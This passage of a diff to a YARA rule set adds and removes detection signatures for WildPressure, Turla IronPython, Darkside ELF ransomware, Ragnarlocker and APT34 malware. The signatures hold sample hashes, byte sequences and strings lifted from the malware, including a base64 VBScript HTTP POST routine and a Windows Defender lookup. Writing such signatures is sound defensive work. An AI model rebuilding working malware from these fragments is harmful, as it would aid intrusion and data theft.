+		logic_hash = "4321051fdc9ab5f4ee12c4b505e4271df89b489067875eaf3d2cb670815f7e37"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "7aec3ed791529182c0f64ce34415c3c705a79f3d628cbcff70c34a9f73d8ff42"
+		hash1 = "7eafb957c2e715e06489a979a185f75d7a9d502223c8aba36e7b6b8ead7d03b2"
+		hash2 = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9"
+		hash3 = "5e0226f37b861876ec38e4a1564a26e4af3022d869375bc0f09b8feea4cd9e1b"
+		tlp = "White"
+		adversary = "WildPressure"
 
 	strings:
-		$s1 = { 7b [4-6] 5b [4-6] 5d 28 [4-6] 5b [4-6] 5d 29 28 [4-6] 5b [4-6] 5d 29 3b 7d }
-		$s2 = { 7b 72 65 74 75 72 6e 20 [4-6] 20 25 20 28 [4-6] 2b [4-6] 29 3b 7d }
-		$s3 = { 7b [4-6] 20 3d 20 [4-6] 28 [4-6] 29 2e 73 70 6c 69 74 28 [4-6] 29 3b 7d }
-		$s4 = { 7b 72 65 74 75 72 6e 20 [4-6] 2e 63 68 61 72 41 74 28 [4-6] 29 3b 7d}
-		$s5 = { 7b [4-6] 5b [4-6] 5d 20 3d 20 [4-6] 5b [4-6] 5b [4-6] 5d 5d 3b 7d }
+		$s1 = { 52 00 4f 00 4f 00 54 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 00 65 00 6c 00 65 00 63 00 74 00 20 [3-7] 20 00 46 00 72 00 6f 00 6d 00 20 00 41 00 6e 00 74 00 69 00 56 00 69 00 72 00 75 00 73 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 20 00 57 00 48 00 45 00 52 00 45 00 20 00 64 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 20 00 3c 00 3e 00 27 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 44 00 65 00 66 00 65 00 6e 00 64 00 65 00 72 00 27 }
+		$s2 = "c1VybCA9IHt1fQ0Kc1JlcXVlc3QgPSB7cH0NCkhUVFBQb3N0IHNVcmwsIHNSZXF1ZXN0DQpGdW5jdGlvbiBIVFRQUG9zdChzVXJsLCBzUmVxdWVzdCkNCiAgc2V0IG9IVFRQID0gQ3JlYXRlT2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpDQogIG9IVFRQLm9wZW4gIlBPU1QiLCBzVXJsLGZhbHNlDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZXF1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogIFdzY3JpcHQuRWNobyBvSFRUUC5yZXNwb25zZVRleHQNCiAgSFRUUFBvc3QgPSBvSFRUUC5yZXNwb25zZVRleHQNCiBFbmQgRnVuY3Rpb24=" fullword ascii
+		$s3 = { 46 49 4c 45 20 48 41 4e 44 45 4c 20 4e 4f 54 20 46 4f 55 4e 44 00 00 00 4e 4f 20 44 61 74 61 00 }
+		$s4 = { 28 00 77 00 73 00 33 00 32 00 29 00 65 00 79 00 4a 00 73 00 62 00 32 00 35 00 6e 00 64 00 32 00 46 00 70 00 64 00 43 00 49 00 36 00 49 00 6a 00 }
+		$s5 = { 55 8b ec 6a ff 68 [3] 00 64 a1 00 00 00 00 50 83 ec 24 a1 [3] 00 33 c5 89 45 f0 ?? 57 50 8d 45 f4 64 a3 00 00 00 00 [8] b9 0f 00 00 00 89 4e }
+		$s6 = { 20 2f 63 20 [0-1] 46 4f 52 20 2f 6c 20 25 69 20 69 6e 20 28 31 2c 31 2c [1-4] 29 20 44 4f 20 49 46 20 4e 4f 54 20 45 58 49 53 54 20 22 00 22 29 }
+		$s7 = { 83 c4 0c 8d 95 44 fe ff ff 52 c7 85 44 fe ff ff 14 01 00 00 ff 15 [3] 00 83 bd 48 fe ff ff 06 7d 17 bf [3] 00 89 bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 eb 1a c7 85 ?? fe ff ff [3] 00 8b bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 }
+		$s8 = { 8b 45 08 50 68 bc 78 45 00 68 d0 78 45 00 8d 8d d0 fc ff ff 51 ff d6 83 c4 10 8b 3d a0 e0 44 00 8b 35 c4 e0 44 00 8d 64 }
 
 	condition:
-		filesize > 1KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
 }
-
-rule ARKBIRD_SOLG_Ransom_Ragnarlocker_July_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Turla_Ironpython_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect Ragnarlocker by strings (July 2020)"
+		description = "Detect IronPython script used by Turla group"
 		author = "Arkbird_SOLG"
-		id = "9291ed33-8d7d-5b88-9075-b847fdbab179"
-		date = "2020-07-30"
-		modified = "2020-07-30"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-30/Yara_Ransom_Ragnarlocker_July_2020_1.yar#L3-L34"
+		id = "303929d4-2c43-5e43-aeb0-09f469f7091b"
+		date = "2021-04-30"
+		modified = "2021-05-01"
+		reference = "https://twitter.com/DrunkBinary/status/1388332507695919104"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Turla/APT_Turla_IronPython_Apr_2021_1.yara#L1-L26"
 		license_url = "N/A"
-		logic_hash = "73d3be9a2d3b315ed6d3d93e2c6f9988d60234530b0398e8949c511f919a8954"
+		logic_hash = "f6b626cddb4832f842a15eddce705fb24125e4341c425cf27dbbe537e2a98bdc"
 		score = 75
-		quality = 23
+		quality = 57
 		tags = "FILE"
-		hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87"
+		hash1 = "65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361"
+		hash2 = "c430ebab4bf827303bc4ad95d40eecc7988bdc17cc139c8f88466bc536755d4e"
+		hash3 = "f76257749792cc4e54f75d0e7a83e7a4429395c5dbc48078a8068575d7e9a98"
+		tlp = "White"
+		adversary = "Turla"
 
 	strings:
-		$f1 = "bootfont.bin" fullword wide
-		$f2 = "bootmgr.efi" fullword wide
-		$f3 = "bootsect.bak" fullword wide
-		$r1 = "$!.txt" fullword wide
-		$r2 = "---BEGIN KEY R_R---" fullword ascii
-		$r3 = "!$R4GN4R_" fullword wide
-		$r4 = "RAGNRPW" fullword ascii
-		$r5 = "---END KEY R_R---" fullword ascii
-		$a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii
-		$a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
-		$a3 = "WinSta0\\Default" fullword wide
-		$a4 = "%s-%s-%s-%s-%s" fullword wide
-		$a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide
-		$c1 = "-backup" fullword wide
-		$c2 = "-force" fullword wide
-		$c3 = "-vmback" fullword wide
-		$c4 = "-list" fullword wide
-		$s1 = ".ragn@r_" fullword wide
-		$s2 = "\\notepad.exe" fullword wide
-		$s3 = "Opera Software" fullword wide
-		$s4 = "Tor browser" fullword wide
+		$s1 = { 6c 61 6d 62 64 61 20 73 2c 6b 3a 27 27 2e 6a 6f 69 6e 28 5b 63 68 72 28 28 6f 72 64 28 63 29 5e 6b 29 25 30 78 31 30 30 29 20 66 6f 72 20 63 20 69 6e 20 73 5d 29 }
+		$s2 = { 66 72 6f 6d 20 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 20 69 6d 70 6f 72 74 2a }
+		$s3 = { 52 69 6a 6e 64 61 65 6c 4d 61 6e 61 67 65 64 28 4b 65 79 53 69 7a 65 3d 31 32 38 2c 42 6c 6f 63 6b 53 69 7a 65 3d 31 32 38 29 }
+		$s4 = { 72 65 74 75 72 6e 20 53 79 73 74 65 6d 2e 41 72 72 61 79 5b 53 79 73 74 65 6d 2e 42 79 74 65 5d 28 5b 6f 72 64 28 78 29 66 6f 72 20 78 20 69 6e 20 6c 69 73 74 28 73 74 72 29 5d 29 }
+		$s5 = { 53 79 73 74 65 6d 2e 41 72 72 61 79 2e 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 53 79 73 74 65 6d 2e 42 79 74 65 2c [10-12] 2e 4c 65 6e 67 74 68 29 }
+		$s6 = { 28 62 61 73 65 36 34 2e 62 36 34 64 65 63 6f 64 65 28 [4-10] 5b 31 36 3a 5d 29 2c 73 79 73 2e 61 72 67 76 5b 31 5d 2c [4-10] 5b 3a 31 36 5d 2c }
+		$s7 = { 41 73 73 65 6d 62 6c 79 2e 4c 6f 61 64 28 }
+		$s8 = { 20 69 66 20 6c 65 6e 28 73 79 73 2e 61 72 67 76 29 21 3d 32 3a }
+		$s9 = { 65 78 63 65 70 74 20 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 45 78 63 65 70 74 69 6f 6e 20 61 73 20 65 78 3a }
+		$s10 = { 69 66 20 5f 5f 6e 61 6d 65 5f 5f 3d 3d }
+		$s11 = { 2e 66 6f 72 6d 61 74 28 65 78 2e 4d 65 73 73 61 67 65 2c 65 78 2e 53 74 61 63 6b 54 72 61 63 65 29 29 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "2c2aab89a4cba444cf2729e2ed61ed4f" and ( ( 2 of ( $f* ) ) and ( 3 of ( $r* ) ) and ( 4 of ( $a* ) ) and ( 2 of ( $c* ) ) and ( 2 of ( $s* ) ) ) )
+		filesize > 100KB and 9 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT34_RDAT_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Darkside_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect Installer from APT34 group"
+		description = "Detect the ELF version of Darkside ransomware"
 		author = "Arkbird_SOLG"
-		id = "32f28376-e792-543b-82f7-36ec627b4fab"
-		date = "2021-02-26"
-		modified = "2021-02-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-26/APT34/APT_APT34_RDAT_Feb_2021_1.yar#L1-L19"
+		id = "10c0ba57-d6d6-5d1d-bd2a-f6f240d71f8b"
+		date = "2021-05-01"
+		modified = "2021-05-02"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1388301138437578757"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Darkside/RAN_ELF_Darkside_Apr_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "61ea6eceda0c7d6ec15db87891c4322002c112383c7a4d0089e35db9636bbe73"
-		score = 50
-		quality = 73
+		logic_hash = "510932893e1e81d6c88e86c7ae2345460b397c936336c7e1a33799dbc1dd6aab"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		level = "experimental"
-		hash1 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c"
+		hash1 = "984ce69083f2865ce90b48569291982e786980aeef83345953276adfcbbeece8"
+		hash2 = "9cc3c217e3790f3247a0c0d3d18d6917701571a8526159e942d0fffb848acffb"
+		hash3 = "c93e6237abf041bc2530ccb510dd016ef1cc6847d43bf023351dce2a96fdc33b"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = "XAVVQxcVAVIfCBYWARQfEBldEU4ZF1JbUFJYCgpCTg==" fullword ascii
-		$s2 = { 0b da 89 5c 24 40 40 38 3d 55 56 }
-		$s3 = { 57 4e 44 31 23 31 2e 32 }
-		$s4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 63 }
-		$seq_Service = { 4c 8b dc 57 48 81 ec e0 02 00 00 48 c7 44 24 70 fe ff ff ff 49 89 5b 10 49 89 73 18 48 8b 05 65 12 0a 00 48 33 c4 48 89 84 24 d0 02 00 00 48 8b d9 48 89 4c 24 78 41 b8 04 01 00 00 49 8d 93 d8 fd ff ff 33 c9 ff 15 9d 20 07 00 85 c0 75 19 ff 15 33 21 07 00 8b d0 48 8d 0d 8a b6 08 00 e8 1d f7 ff ff e9 a5 01 00 00 33 f6 48 89 b4 24 90 00 00 00 48 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 d4 9f ff ff 66 39 b4 24 c0 00 00 00 75 05 44 8b c6 eb 1f 48 8d 84 24 c0 00 00 00 49 83 c8 ff 66 0f 1f 84 00 00 00 00 00 49 ff c0 66 42 39 34 40 75 f6 48 8d 94 24 c0 00 00 00 48 8d 8c 24 80 00 00 00 e8 41 05 00 00 90 4c 8b c3 48 8d 8c 24 a0 00 00 00 e8 60 0a 00 00 90 49 83 c9 ff 45 33 c0 48 8b d0 48 8d 8c 24 80 00 00 00 e8 a8 07 00 00 90 45 33 c0 b2 01 48 8d 8c 24 a0 00 00 00 e8 55 9f ff ff 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 d5 1e 07 00 48 8b f8 48 85 c0 75 19 ff 15 5f 20 07 00 8b d0 48 8d 0d de b5 08 00 e8 49 f6 ff ff e9 be 00 00 00 4c 8d 8c 24 80 00 00 00 48 83 bc 24 98 00 00 00 08 4c 0f 43 8c 24 80 00 00 00 48 8d 15 33 7a 0a 00 4c 8b c2 48 83 3d 40 7a 0a 00 08 4c 0f 43 05 20 7a 0a 00 48 0f 43 15 18 7a 0a 00 48 89 74 24 60 48 89 74 24 58 48 89 74 24 50 48 89 74 24 48 48 89 74 24 40 4c 89 4c 24 38 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 41 b9 ff 01 0f 00 48 8b c8 ff 15 23 1e 07 00 48 8b f0 48 85 c0 75 16 ff 15 bd 1f 07 00 8b d0 48 8d 0d 5c b5 08 00 e8 a7 f5 ff ff eb 15 48 8d 0d 6e b5 08 00 e8 99 f5 ff ff 48 8b ce ff 15 e0 1d 07 00 48 8b cf ff 15 d7 1d 07 00 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 54 9e ff ff 90 45 33 c0 b2 01 48 8b cb e8 46 9e ff ff 48 8b 8c 24 d0 02 00 00 48 33 cc e8 d6 94 02 00 4c 8d 9c 24 e0 02 00 00 49 8b 5b 18 49 8b 73 20 49 8b e3 5f }
-		$seq_ConnectC2 = { 33 c0 48 89 44 24 70 48 89 44 24 78 66 89 7c 24 70 8d 48 35 ff 15 2f 62 07 00 66 89 44 24 72 48 8b cb e8 ea dc ff ff 48 8b c8 ff 15 29 62 07 00 89 44 24 74 49 8b cd e8 d5 dc ff ff 48 8b d0 c7 44 24 28 10 00 00 00 48 8d 44 24 70 48 89 44 24 20 45 33 c9 45 8b 45 10 49 8b cc ff 15 e0 61 07 00 83 f8 ff 75 12 45 33 c0 48 8d 15 6b cb 08 00 48 8b ce e8 79 de ff ff 4c 89 a4 24 a8 00 00 00 c7 84 24 a0 00 00 00 01 00 00 00 48 c7 44 24 38 0a 00 00 00 41 8d 4c 24 01 48 8d 44 24 38 48 89 44 24 20 45 33 c9 45 33 c0 48 8d 94 24 a0 00 00 00 ff 15 aa 61 07 00 83 f8 01 0f 94 c0 84 c0 0f 84 0f 01 00 00 45 33 c9 41 b8 00 02 00 00 48 8d 94 24 b0 02 00 00 49 8b cc ff 15 72 61 07 00 4c 63 c0 85 c0 0f 8e ea 00 00 00 41 8b c8 49 8b d0 49 8b c0 45 85 c0 0f 8e d8 00 00 00 0f 1f 44 00 00 80 bc 04 b0 02 00 00 00 0f 85 b7 00 00 00 48 3b d0 0f 84 ae 00 00 00 85 c9 0f 84 b4 00 00 00 83 c1 03 41 3b c8 0f 8d a8 00 00 00 48 8d 9c 24 b0 02 00 00 48 03 da 48 63 c1 48 8d bc 24 b0 02 00 00 48 03 f8 4c 89 b4 24 90 00 00 00 4c 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 0a dd ff ff 48 3b fb 74 17 48 2b df 4c 8b c3 48 8b d7 48 8d 8c 24 80 00 00 00 e8 6f dd ff ff 90 48 8d 84 24 80 00 00 00 48 3b f0 74 18 49 83 c9 ff 45 33 c0 48 8d 94 24 80 00 00 00 48 8b ce e8 2a de ff ff 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 b7 dc ff ff 48 8b 5c 24 48 bf }
-		$seq_RegisterEvent = { 40 53 48 83 ec 20 48 83 3d 5a 79 0a 00 08 48 8d 1d 3b 79 0a 00 48 8b cb 48 8d 15 91 01 00 00 48 0f 43 0d 29 79 0a 00 ff 15 93 1d 07 00 48 89 05 44 77 0a 00 48 8b c8 48 85 c0 75 2d 48 83 3d 24 79 0a 00 08 48 0f 43 1d 04 79 0a 00 48 8b d3 ff 15 7b 1d 07 00 48 85 c0 74 62 48 8b c8 ff 15 35 1d 07 00 48 83 c4 20 5b c3 33 c0 c7 05 db 76 0a 00 10 00 00 00 48 89 05 e0 76 0a 00 48 8d 15 cd 76 0a 00 8b 05 17 1c 0a 00 89 05 d5 76 0a 00 ff c0 89 05 09 1c 0a 00 48 c7 05 b2 76 0a 00 02 00 00 00 c7 05 bc 76 0a 00 b8 0b 00 00 ff 15 06 1d 07 00 48 83 c4 20 5b }
+		$seq1 = { 48 8d 3d d1 e8 3b 00 e8 9c 51 f2 ff 85 c0 74 c6 4c 8d 6c 24 10 4c 89 ef e8 ab bf 02 00 48 8d 1d 34 bb 37 00 49 8d 75 08 48 8d 3d 31 e1 3b 00 48 8d 43 10 48 89 05 1e e1 3b 00 e8 09 1e 02 00 48 8d 05 22 d8 0e 00 48 8b 7c 24 18 c7 05 4b e1 3b 00 01 00 00 00 48 89 05 1c e1 3b 00 48 8d 05 4d d8 0e 00 48 85 ff 48 89 05 13 e1 3b 00 48 8d 05 84 d8 0e 00 48 89 05 0d e1 3b 00 48 8d 05 be d8 0e 00 48 89 05 07 e1 3b 00 48 8d 05 48 d9 0e 00 48 89 05 01 e1 3b 00 48 8d 43 10 48 89 44 24 10 74 05 e8 21 45 f2 ff 4c 8d ac 24 30 03 00 00 4c 89 ef e8 11 bf 02 00 4c 8d b4 24 10 03 00 00 ba 03 00 00 00 4c 89 ee 4c 89 f7 e8 39 62 ff ff 48 8b bc 24 38 03 00 00 48 8d 43 10 48 89 84 24 30 03 00 00 48 85 ff 74 05 e8 db 44 f2 ff 4c 8d 6c 24 30 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 06 62 ff ff 48 8b bc 24 18 03 00 00 48 8d 43 10 48 89 84 24 10 03 00 00 48 85 ff 74 05 e8 a8 44 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 81 e0 3b 00 48 89 05 72 e0 3b 00 e8 0d 1d 02 00 48 8d 05 26 d7 0e 00 48 8b 7c 24 38 c7 05 9f e0 3b 00 01 00 00 00 48 89 05 70 e0 3b 00 48 8d 05 51 d7 0e 00 48 85 ff 48 89 05 67 e0 3b 00 48 8d 05 88 d7 0e 00 48 89 05 61 e0 3b 00 48 8d 05 c2 d7 0e 00 48 89 05 5b e0 3b 00 48 8d 05 4c d8 0e 00 48 89 05 55 e0 3b 00 48 8d 43 10 48 89 44 24 30 74 05 e8 25 44 f2 ff 4c 8d b4 24 50 03 00 00 4c 89 f7 e8 05 c5 02 00 4c 8d 6c 24 50 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 40 61 ff ff 48 8b bc 24 58 03 00 00 48 8d 43 10 48 89 84 24 50 03 00 00 48 85 ff 74 05 e8 e2 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 0b e0 3b 00 48 89 05 fc df 3b 00 e8 47 1c 02 00 48 8d 05 18 d8 0e 00 48 8b 7c 24 58 c7 05 29 e0 3b 00 01 00 00 00 48 89 05 fa df 3b 00 48 8d 05 33 d8 0e 00 48 85 ff 48 89 05 f1 df 3b 00 48 8d 05 5a d8 0e 00 48 89 05 eb df 3b 00 48 8d 05 84 d8 0e 00 48 89 05 e5 df 3b 00 48 8d 05 de d8 0e 00 48 89 05 df df 3b 00 48 8d 43 10 48 89 44 24 50 74 05 e8 5f 43 f2 ff 4c 8d b4 24 70 03 00 00 4c 89 f7 e8 3f c4 02 00 4c 8d 6c 24 70 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 7a 60 ff ff 48 8b bc 24 78 03 00 00 48 8d 43 10 48 89 84 24 70 03 00 00 48 85 ff 74 05 e8 1c 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 95 df 3b 00 48 89 05 86 df 3b 00 e8 81 1b 02 00 48 8d 05 9a d8 0e 00 48 8b 7c 24 78 c7 05 b3 df 3b 00 01 00 00 00 48 89 05 84 df 3b 00 48 8d 05 c5 d8 0e 00 48 85 ff 48 89 05 7b df 3b 00 48 8d 05 fc d8 0e 00 48 89 05 75 df 3b 00 48 8d 05 36 d9 0e 00 48 89 05 6f df 3b 00 48 8d 05 b0 d9 0e 00 48 89 05 69 df 3b 00 48 8d 43 10 48 89 44 24 70 74 05 e8 99 42 f2 ff 4c 8d ac 24 90 03 00 00 4c 89 ef e8 19 be 02 00 4c 8d b4 24 b0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 b1 5f ff ff 4c 8d ac 24 90 00 00 00 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 99 5f ff ff 48 8b bc 24 b8 03 00 00 48 8d 43 10 48 89 84 24 b0 03 00 00 48 85 ff 74 05 e8 3b 42 f2 ff 48 8b bc 24 98 03 00 00 48 8d 43 10 48 89 84 24 90 03 00 00 48 85 ff 74 05 e8 1d 42 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d e6 de 3b 00 48 89 05 d7 de 3b 00 e8 82 1a 02 00 48 8d 05 43 d9 0e 00 48 8b bc 24 98 00 00 00 c7 05 01 df 3b 00 01 00 00 00 48 89 05 d2 de 3b 00 48 8d 05 53 d9 0e 00 48 85 ff 48 89 05 c9 de 3b 00 48 8d 05 72 d9 0e 00 48 89 05 c3 de 3b 00 48 8d 05 94 d9 0e 00 48 89 05 bd de 3b 00 48 8d 05 de d9 0e 00 48 89 05 b7 de 3b 00 48 8d 43 10 48 89 84 24 90 00 00 00 74 05 e8 94 41 f2 ff 4c 8d ac 24 d0 03 00 00 4c 89 ef e8 14 bd 02 00 4c 8d b4 24 f0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 ac 5e ff ff 4c 8d ac 24 b0 00 00 00 ba 03 00 00 00 4c 89 f6 4c 89 ef e8 94 5e ff ff 48 8b bc 24 f8 03 00 00 48 8d 43 10 48 89 84 24 f0 03 00 00 48 85 ff 74 05 e8 36 41 f2 ff 48 8b bc 24 d8 03 00 00 48 8d 43 10 48 89 84 24 d0 03 00 00 48 85 ff 74 05 e8 18 41 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 31 de 3b 00 48 89 05 22 de 3b 00 e8 7d 19 02 00 48 8d 05 56 d9 0e 00 48 8b bc 24 b8 00 00 00 c7 05 4c de 3b 00 01 00 00 00 48 89 05 1d de 3b 00 48 8d 05 6e d9 0e 00 48 85 ff 48 89 05 14 de 3b 00 48 8d 05 95 d9 0e 00 48 89 05 0e de 3b 00 48 8d 05 bf d9 0e 00 48 89 05 08 de 3b 00 48 8d 05 19 da 0e 00 48 89 05 02 de 3b 00 48 8d 43 10 48 89 84 24 b0 00 00 00 74 05 e8 8f 40 f2 ff 4c 8d ac 24 10 04 00 00 4c 89 ef e8 0f bc 02 00 4c 8d b4 24 30 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a7 5d ff ff 4c 8d ac 24 d0 00 00 00 ba 05 00 00 00 4c 89 f6 4c 89 ef e8 8f 5d ff ff 48 8b bc 24 38 04 00 00 48 8d 43 10 48 89 84 24 30 04 00 00 48 85 ff 74 05 e8 31 40 f2 ff 48 8b bc 24 18 04 00 00 48 8d 43 10 48 89 84 24 10 04 00 00 48 85 ff 74 05 e8 13 40 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 7c dd 3b 00 48 89 05 6d dd 3b 00 e8 78 18 02 00 48 8d 05 99 d9 0e 00 48 8b bc 24 d8 00 00 00 c7 05 97 dd 3b 00 01 00 00 00 48 89 05 68 dd 3b 00 48 8d 05 b9 d9 0e 00 48 85 ff 48 89 05 5f dd 3b 00 48 8d 05 e8 d9 0e 00 48 89 05 59 dd 3b 00 48 8d 05 1a da 0e 00 48 89 05 53 dd 3b 00 48 8d 05 84 da 0e 00 48 89 05 4d dd 3b 00 48 8d 43 10 48 89 84 24 d0 00 00 00 74 05 e8 8a 3f f2 ff 4c 8d ac 24 50 04 00 00 4c 89 ef e8 0a bb 02 00 4c 8d b4 24 70 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a2 5c ff ff 4c 8d ac 24 f0 00 00 00 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 8a 5c ff ff 48 8b bc 24 78 04 00 00 48 8d 43 10 48 89 84 24 70 04 00 00 48 85 ff 74 05 e8 2c 3f f2 ff 48 8b bc 24 58 04 00 00 48 8d 43 10 48 89 84 24 50 04 00 00 48 85 ff 74 05 e8 0e 3f f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d c7 dc 3b 00 48 89 05 b8 dc 3b 00 e8 73 17 02 00 48 8d 05 0c da 0e 00 48 8b bc 24 f8 00 00 00 c7 05 e2 dc 3b 00 01 00 00 00 48 89 05 b3 dc 3b 00 48 8d 05 34 da 0e 00 48 85 ff 48 89 05 aa dc 3b 00 48 8d 05 6b da 0e 00 48 89 05 a4 dc 3b 00 48 8d 05 a5 da 0e 00 48 89 05 9e dc 3b 00 48 8d 05 1f db 0e 00 48 89 05 98 dc 3b 00 48 8d 43 10 48 89 84 24 f0 00 00 00 74 05 e8 85 3e f2 ff 4c 8d ac 24 90 04 00 00 4c 89 ef e8 05 ba 02 00 4c 8d b4 24 b0 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 9d 5b ff ff 4c 8d ac 24 10 01 00 00 ba 09 00 00 00 4c 89 f6 4c 89 ef e8 85 5b ff ff 48 8b bc 24 b8 04 00 00 48 8d 43 10 48 89 84 24 b0 04 00 00 48 85 ff 74 05 e8 27 3e f2 ff 48 8b bc 24 98 04 00 00 48 8d 43 10 48 89 84 24 90 04 00 00 48 85 ff 74 05 e8 09 3e f2 ff 48 8d 43 10 49 8d }
+		$seq2 = { 41 56 49 89 fe 41 55 41 89 cd 41 54 45 8d 60 01 55 53 44 89 c3 48 81 ec 98 06 00 00 41 39 cc 89 74 24 10 48 89 54 24 30 0f 84 ab 09 00 00 48 8d 84 24 80 00 00 00 41 8d 70 ff 48 8d ac 24 10 01 00 00 48 89 c7 48 89 44 24 48 e8 0f 89 f6 ff be 01 00 00 00 48 89 ef e8 02 51 f6 ff 4c 8d a4 24 e0 00 00 00 89 de 4c 89 e7 e8 f0 88 f6 ff 48 8d 84 24 b0 00 00 00 48 89 ea 4c 89 e6 48 89 c7 48 89 44 24 20 e8 55 8d f6 ff 48 8d 1d 4e a2 2f 00 49 8d 7c 24 08 4c 8d 7b 10 4c 89 bc 24 e0 00 00 00 e8 48 eb ea ff 48 8d 7d 08 4c 89 bc 24 10 01 00 00 e8 37 eb ea ff 48 8d 84 24 40 01 00 00 41 8d 75 ff 48 89 c7 48 89 44 24 38 e8 8e 88 f6 ff 48 8d 84 24 d0 01 00 00 be 01 00 00 00 48 89 c7 49 89 c7 48 89 44 24 50 e8 71 50 f6 ff 48 8d ac 24 a0 01 00 00 44 89 ee 48 89 ef e8 5e 88 f6 ff 48 8d 84 24 70 01 00 00 4c 89 fa 48 89 ee 48 89 c7 48 89 44 24 40 e8 c3 8c f6 ff 4c 8d 63 10 48 8d 7d 08 48 8d ac 24 00 02 00 00 4c 89 a4 24 a0 01 00 00 e8 b6 ea ea ff 4c 89 ff 4c 89 a4 24 d0 01 00 00 4c 8d a4 24 30 02 00 00 48 83 c7 08 e8 9a ea ea ff 4c 63 7c 24 10 49 8d 46 30 48 89 44 24 18 0f 1f 40 00 e8 b3 7c f6 ff 49 89 c5 e8 ab 75 f6 ff 4c 89 2c 24 4c 8b 6c 24 18 49 89 c1 48 8b 4c 24 20 48 8b 54 24 48 41 b8 01 00 00 00 48 8b 74 24 30 4c 89 ef e8 32 f9 f6 ff 4c 89 fe 48 89 ef e8 b7 4f f6 ff 4c 89 ea 48 89 ee 4c 89 e7 e8 09 d9 f6 ff 48 8b 4c 24 40 48 8b 54 24 38 4d 89 e1 48 8b 74 24 30 4c 89 2c 24 41 b8 01 00 00 00 4c 89 f7 e8 f5 f8 f6 ff 48 8b 94 24 50 02 00 00 48 8b 8c 24 40 02 00 00 41 89 c5 48 39 8c 24 48 02 00 00 48 8d 43 10 48 0f 46 8c 24 48 02 00 00 48 85 d2 48 89 84 24 30 02 00 00 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 40 4f f7 ff 48 8b 94 24 20 02 00 00 48 8b 8c 24 10 02 00 00 48 